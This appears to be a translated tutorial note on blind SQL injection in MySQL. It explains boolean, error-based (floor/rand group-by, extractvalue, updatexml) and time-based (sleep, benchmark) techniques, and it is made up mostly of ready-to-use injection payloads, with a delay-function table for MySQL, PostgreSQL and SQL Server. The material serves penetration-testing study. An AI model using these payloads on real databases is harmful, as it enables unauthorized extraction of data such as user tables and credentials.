Blind note
What are blinds? Blind injection means that in the SQL injection process, after the SQL statement is selected, the selected data cannot be echoed to the front-end page. At this point, we need to use some methods to judge or try, this process is called blind injection.
There are three types of blinds
• Boolean SQL based blind injection
• Time-based blind SQL injection
• Error-based blind SQL injection
1. Based on Boolean SQL blind annotation——constructing logical judgment
We can use logical judgment to
Intercept string related function analysis http://blog.csdn.net/Fly_hps/article/details/80245853
left() function
left(database(),1)>'s'
Description: database() displays the database name, and left(a,b) intercepts the first b bits of a from the left for testing.
ascii() function
ascii(substr(select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1) =101 --+
Description: substr(a,b,c) starts from position b and intercepts the length of c of string a. Ascii() converts a character to an ascii value.
ord() function
ord(mid(select ifnull(cast(username AS CHAR),0x20) from security.users order by id limit 0,1),1,1)>98
Description: mid(a,b,c) starts from position b and intercepts the c position of the a string
The ord function, like the ascii function, will convert characters to ascii values, and then perform comparison operations.
regexp regular injection
Introduction to regular injection: https://blog.csdn.net/Fly_hps/article/details/80246278
like configuration injection
Similar to the above regular, mysql can use like to match when matching.
Usage: select user() like 'ro%'
Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a;Explanation: There are three points here.
First , concat count is required.
Second, floor, obtain 0 or 1, and repeat the data.
Third , group by is used for grouping.
However, the explanation of the specific principle is not very clear. The general principle is the error caused by the repetition of data counting after grouping. There are also issues explained as bugs in mysql. But here you need to try rand(0) and rand() several times.
The above statement can be simplified to the following form:
select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))
This form can be used if critical tables are disabled
select count(*) from (select 1 union select null union select !1) group by concat(version(),floor(rand(0)*2))
If rand is disabled, you can use user variables to report errors
select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)
extractvalue()
extractvalue(1,concat(0x7e,(select @@version),0x7e))
The Xpath function that mysql queries and modifies xml data, the Xpath syntax is wrong.
Reference article: https://blog.csdn.net/Fly_hps/article/details/79416728
updatexml()
updatexml(1,concat(0x7e,(select @@version),0x7e),1)
mysql queries and modifies Xpath functions on XML data, Xpath syntax errors
refer to the article: https://blog.csdn.net/Fly_hps/article/details/79416842
3. Time-based blinds
If(ascii(substr(database(),1,1))>115,0,sleep(5))%23
Description: if judgment statement, when the condition is false, execute sleep
Encounter the following delay injection statement using sleep():
select sleep(find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8,9,.'));
This statement means to find the first digit of the version number between 0-9. However, in our actual penetration testing process, this usage is not advisable, because the time will be affected by other factors such as network speed, so it will affect the judgment of the result.
UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM (select database() as current) as tb1;
banchmark(count, expr) is used to test the performance of the function, the number of parameters is one, and the second is the expression to be executed.
The function can be executed several times, and the returned result is longer than usual. Through the change of time length, it can be judged whether the statement is executed successfully. This is a side-channel attack that consumes a lot of CPU resources during operation. It is recommended to use the sleep() function for injection.
Mysql |
BENCHMARK(100000,MD5(1)) or sleep(5) |
Postgresql |
PG_SLEEP(5) OR GENERATE_SERIES(1,10000) |
Ms sql server |
WAITFOR DELAY '0:0:5' |